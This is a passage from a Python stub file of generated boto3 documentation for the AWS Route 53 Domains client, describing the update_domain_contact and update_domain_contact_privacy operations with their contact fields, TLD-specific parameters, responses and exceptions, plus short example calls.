'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
}
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to update contact information for.\n
:type AdminContact: dict
:param AdminContact: Provides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. 
Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the 
following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type RegistrantContact: dict
:param RegistrantContact: Provides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. 
Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the 
following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type TechContact: dict
:param TechContact: Provides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. 
Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the 
following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The UpdateDomainContact response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'OperationId': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
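# --- Illustrative sketch (not part of the generated stubs) ---
# A minimal example of updating only the technical contact and then polling the
# returned operation with get_operation_detail, as the docstring suggests. The
# domain and contact values are placeholders; boto3 and credentials are assumed.
def _example_update_tech_contact():
    import time
    import boto3

    client = boto3.client('route53domains')
    response = client.update_domain_contact(
        DomainName='example.com',
        TechContact={
            'FirstName': 'Pat',
            'LastName': 'Doe',
            'ContactType': 'PERSON',
            'AddressLine1': '123 Main St',
            'City': 'Seattle',
            'State': 'WA',
            'CountryCode': 'US',
            'ZipCode': '98101',
            'PhoneNumber': '+1.2065550100',
            'Email': 'pat@example.com',
        },
    )

    # Poll until the operation leaves the SUBMITTED / IN_PROGRESS states.
    while True:
        detail = client.get_operation_detail(OperationId=response['OperationId'])
        if detail['Status'] not in ('SUBMITTED', 'IN_PROGRESS'):
            return detail['Status']
        time.sleep(30)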
def update_domain_contact_privacy(DomainName=None, AdminPrivacy=None, RegistrantPrivacy=None, TechPrivacy=None):
"""
This operation updates the specified domain contact\'s privacy setting. When privacy protection is enabled, contact information such as email address is replaced either with contact information for Amazon Registrar (for .com, .net, and .org domains) or with contact information for our registrar associate, Gandi.
This operation affects only the contact information for the specified contact type (registrant, administrator, or tech). If the request succeeds, Amazon Route 53 returns an operation ID that you can use with GetOperationDetail to track the progress and completion of the action. If the request doesn\'t complete successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.update_domain_contact_privacy(
DomainName='string',
AdminPrivacy=True|False,
RegistrantPrivacy=True|False,
TechPrivacy=True|False
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to update the privacy setting for.\n
:type AdminPrivacy: boolean
:param AdminPrivacy: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the admin contact.
:type RegistrantPrivacy: boolean
:param RegistrantPrivacy: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the registrant contact (domain owner).
:type TechPrivacy: boolean
:param TechPrivacy: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the technical contact.
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The UpdateDomainContactPrivacy response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To use this ID to query the operation status, use GetOperationDetail.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'OperationId': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
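# --- Illustrative sketch (not part of the generated stubs) ---
# A minimal example of enabling WHOIS privacy for all three contact types on a
# single domain, as described above. The domain name is a placeholder; boto3
# and credentials are assumed.
def _example_enable_contact_privacy():
    import boto3

    client = boto3.client('route53domains')
    response = client.update_domain_contact_privacy(
        DomainName='example.com',
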